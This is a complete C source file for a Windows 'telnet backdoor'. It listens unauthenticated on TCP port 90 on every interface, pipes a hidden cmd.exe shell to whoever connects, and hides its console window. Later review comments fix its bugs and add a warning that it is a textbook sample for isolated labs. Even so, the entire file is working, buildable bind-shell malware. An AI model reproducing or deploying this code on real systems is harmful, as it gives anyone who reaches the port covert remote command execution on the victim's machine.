/****************************************************
created : 2004/10/09
created : 9:10:2004 9:37
file base : tini
file ext : c
author : XueFeng
purpose : telnet backdoor
****************************************************/
#include <stdio.h>
#include <string.h>
#include <winsock2.h>
#pragma comment(lib, "ws2_32.lib")
#pragma comment(lib, "kernel32.lib")
#define PORT 90
/* Listening socket, and the most recently accept()ed client.  ClientSocket is
   overwritten by main() on every accept() and read by both worker threads
   without any locking or lifetime handshake. */
SOCKET ServerSocket = INVALID_SOCKET;
SOCKET ClientSocket = INVALID_SOCKET;
/* Two anonymous pipes: hReadPipe/hWriteFile carry client input to the child's
   stdin (created in ThreadFuncA); hReadFile/hWritePipe carry the child's
   stdout/stderr back to the client (created in ThreadFuncB).  All four are
   created with bInheritHandle = TRUE so the spawned shell inherits them. */
HANDLE hReadPipe, hWritePipe, hWriteFile, hReadFile;
/* Set to 1 by each thread once its pipe exists; main() busy-waits on them.
   NOTE(review): plain (non-volatile, non-atomic) globals polled from another
   thread -- an optimising compiler may hoist the load out of main()'s loop;
   confirm behaviour with optimisation enabled. */
unsigned char varA,varB;
// Thread A: receive bytes from the telnet client and feed them to the shell's stdin
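/*
 * Worker thread: creates the stdin pipe for the spawned shell, then copies
 * everything received on ClientSocket into the pipe's write end.
 *
 * lpParam is unused.  Returns 1 if the pipe could not be created (varA is
 * then never set, so main() keeps waiting instead of launching the shell with
 * an invalid handle); otherwise never returns.
 */
DWORD WINAPI ThreadFuncA(LPVOID lpParam)
{
    SECURITY_ATTRIBUTES pipeattr;
    DWORD nByteWritten;
    int nByteRead;
    char recv_buff[1024];

    (void)lpParam;

    pipeattr.nLength = sizeof(SECURITY_ATTRIBUTES);
    pipeattr.lpSecurityDescriptor = NULL;
    pipeattr.bInheritHandle = TRUE;   /* the child must inherit the read end */

    if (!CreatePipe(&hReadPipe, &hWriteFile, &pipeattr, 0)) {
        printf("CreatePipe (stdin) failed!\n");
        return 1;
    }
    varA = 1;   /* signal main(): stdin pipe is ready */

    while (TRUE)
    {
        Sleep(250);
        nByteRead = recv(ClientSocket, recv_buff, sizeof recv_buff, 0);
        /* The original stored recv()'s int result in a DWORD and passed it
           straight to WriteFile(): SOCKET_ERROR (-1) became 0xFFFFFFFF, a
           4 GB write from a 1 KB stack buffer.  recv() fails every iteration
           until the first client connects (ClientSocket starts as
           INVALID_SOCKET), so skip errors and orderly shutdowns (0). */
        if (nByteRead == SOCKET_ERROR || nByteRead == 0)
            continue;
        WriteFile(hWriteFile, recv_buff, (DWORD)nByteRead, &nByteWritten, NULL);
    }
    return 0;
}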
// Thread B: send the command output (shell stdout/stderr) back to the telnet client
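/*
 * Worker thread: creates the stdout/stderr pipe for the spawned shell, then
 * relays everything the shell writes into it to ClientSocket.
 *
 * lpParam is unused.  Returns 1 if the pipe could not be created (varB stays
 * 0 so main() does not launch the shell), 0 once the pipe breaks (the shell
 * exited); otherwise loops forever.
 */
DWORD WINAPI ThreadFuncB(LPVOID lpParam)
{
    SECURITY_ATTRIBUTES pipeattr;
    DWORD len;
    char send_buff[25000];

    (void)lpParam;

    pipeattr.nLength = sizeof(SECURITY_ATTRIBUTES);
    pipeattr.lpSecurityDescriptor = NULL;
    pipeattr.bInheritHandle = TRUE;   /* the child must inherit the write end */

    if (!CreatePipe(&hReadFile, &hWritePipe, &pipeattr, 0)) {
        printf("CreatePipe (stdout) failed!\n");
        return 1;
    }
    varB = 1;   /* signal main(): output pipe is ready */

    while (TRUE)
    {
        len = 0;
        /* The original ignored ReadFile()'s result: once the child exits the
           pipe breaks, ReadFile fails without setting len, and the loop
           spun forever calling send() with an uninitialised length. */
        if (!ReadFile(hReadFile, send_buff, sizeof send_buff, &len, NULL))
            break;
        if (len == 0)
            continue;
        /* send() failing (no client yet, or client gone) drops this chunk,
           exactly as the original did. */
        send(ClientSocket, send_buff, (int)len, 0);
    }
    return 0;
}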
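/*
 * Entry point: binds an unauthenticated command shell to TCP port PORT on
 * every interface (INADDR_ANY), spawns cmd.exe / command.exe with its standard
 * handles wired to the two pipes, then hands each accepted connection to the
 * pipe threads.
 *
 * SECURITY: there is no authentication, encryption or access control of any
 * kind -- anyone who can reach the port gets an interactive shell running with
 * this process's privileges, and the window is hidden (SW_HIDE).  This is a
 * textbook backdoor sample; only build or run it on systems you own, inside an
 * isolated lab.
 *
 * Returns 1 on any setup failure; the accept loop itself never terminates.
 */
int main(void)
{
    WSADATA WSAData;
    struct sockaddr_in RemoteAddr;
    DWORD dwThreadIdA, dwThreadIdB;
    OSVERSIONINFO osvi;
    PROCESS_INFORMATION processinfo;
    STARTUPINFO startinfo;
    char szAPP[256];
    const char *interp;
    BOOL ok;

    /* ---- listening socket ------------------------------------------- */
    if (WSAStartup(MAKEWORD(2,2), &WSAData) != 0) {
        printf("WSAStartup failed!\n");
        return 1;
    }
    ServerSocket = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    if (ServerSocket == INVALID_SOCKET) {
        printf("socket() failed!\n");
        return 1;
    }
    memset(&RemoteAddr, 0, sizeof RemoteAddr);
    RemoteAddr.sin_family = AF_INET;
    RemoteAddr.sin_port = htons(PORT);
    RemoteAddr.sin_addr.S_un.S_addr = htonl(INADDR_ANY);   /* all interfaces */
    if (bind(ServerSocket, (LPSOCKADDR)&RemoteAddr, sizeof(RemoteAddr)) == SOCKET_ERROR ||
        listen(ServerSocket, 5) == SOCKET_ERROR) {
        printf("bind/listen failed!\n");
        return 1;
    }

    /* ---- pipe threads ----------------------------------------------- */
    varA = 0;
    varB = 0;
    if (CreateThread(NULL, 0, ThreadFuncA, NULL, 0, &dwThreadIdA) == NULL ||
        CreateThread(NULL, 0, ThreadFuncB, NULL, 0, &dwThreadIdB) == NULL) {
        printf("CreateThread failed!\n");
        return 1;
    }
    /* Wait until BOTH pipes exist.  The original tested `(varA || varB) == 0`,
       which releases the wait as soon as EITHER thread has created its pipe,
       so the other pipe's handle below could still be uninitialised when it
       is handed to CreateProcess. */
    do {
        Sleep(250);
    } while (varA == 0 || varB == 0);

    /* ---- child process set-up --------------------------------------- */
    GetStartupInfo(&startinfo);
    startinfo.dwFlags = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;
    startinfo.hStdInput = hReadPipe;     /* read end of the client->shell pipe */
    startinfo.hStdError = hWritePipe;    /* write end of the shell->client pipe */
    startinfo.hStdOutput = hWritePipe;
    startinfo.wShowWindow = SW_HIDE;     /* no console window on the desktop */

    osvi.dwOSVersionInfoSize = sizeof(OSVERSIONINFO);
    GetVersionEx(&osvi);
    /* Pass the real buffer size: the original passed MAX_PATH + 1 (261) for a
       256-byte array. */
    if (GetSystemDirectory(szAPP, sizeof szAPP) == 0) {
        printf("GetSystemDirectory failed!\n");
        return 1;
    }
    /* The published listing shows "//cmd.exe" and "/n": its backslashes were
       evidently lost, so restore them ("\\" in source is one '\').
       NOTE(review): "command.exe" kept as in the original for the non-NT
       branch; the Win9x interpreter is normally COMMAND.COM -- confirm. */
    interp = (osvi.dwPlatformId == VER_PLATFORM_WIN32_NT) ? "\\cmd.exe"
                                                           : "\\command.exe";
    if (strlen(szAPP) + strlen(interp) >= sizeof szAPP) {   /* bounded strcat */
        printf("System directory path too long!\n");
        return 1;
    }
    strcat(szAPP, interp);

    if (osvi.dwPlatformId == VER_PLATFORM_WIN32_NT) {
        /* NT: full path as lpApplicationName, inherit the pipe handles */
        ok = CreateProcess(szAPP, NULL, NULL, NULL, TRUE, 0, NULL, NULL,
                           &startinfo, &processinfo);
    } else {
        /* 9x: path passed as the (writable) command line, as in the original;
           its result was previously never checked */
        ok = CreateProcess(NULL, szAPP, NULL, NULL, TRUE, 0, NULL, NULL,
                           &startinfo, &processinfo);
    }
    if (!ok) {
        printf("Create Process Error!\n");
        return 1;
    }
    /* We never wait on the child; drop our handles so they do not leak. */
    CloseHandle(processinfo.hThread);
    CloseHandle(processinfo.hProcess);

    /* ---- accept loop ------------------------------------------------ */
    /* NOTE(review): each accept() overwrites ClientSocket while the pipe
       threads may still be using the previous one; the old socket is neither
       closed nor handed over safely.  Kept as in the original. */
    while (TRUE)
    {
        ClientSocket = accept(ServerSocket, NULL, NULL);
        Sleep(250);
    }
    return 0;
}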